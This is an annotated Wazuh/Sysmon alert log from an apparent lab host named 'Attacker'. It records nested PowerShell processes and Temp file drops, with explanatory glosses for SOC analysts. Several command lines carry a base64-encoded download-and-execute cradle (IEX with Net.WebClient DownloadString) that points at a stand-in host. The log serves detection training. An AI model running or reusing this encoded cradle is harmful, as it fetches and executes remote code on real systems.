ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:16.709 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd94-680a-9f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 90 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high-value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534361.1820650 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:18.4176699Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285234 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:18.402
ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00}
ProcessId: 9520
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2q2rgyzm.xew.ps1
CreationUtcTime: 2025-04-24 22:39:18.402
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:18.402 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd94-680a-9f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2q2rgyzm.xew.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:18.402 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 87 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534365.1823415 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:22.8896094Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285277 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:19.846
ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00}
ProcessId: 13412
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00}
ParentProcessId: 9520
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:19.846 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd97-680a-a20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 91 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534365.1831482 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:23.1989175Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285278 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:23.146
ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00}
ProcessId: 13412
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1
CreationUtcTime: 2025-04-24 22:39:23.146
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:23.146 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd97-680a-a20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:23.146 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 88 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534369.1834251 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:26.3809613Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285299 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:24.789
ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00}
ProcessId: 12304
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00}
ParentProcessId: 13412
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:24.789 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd9c-680a-a40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
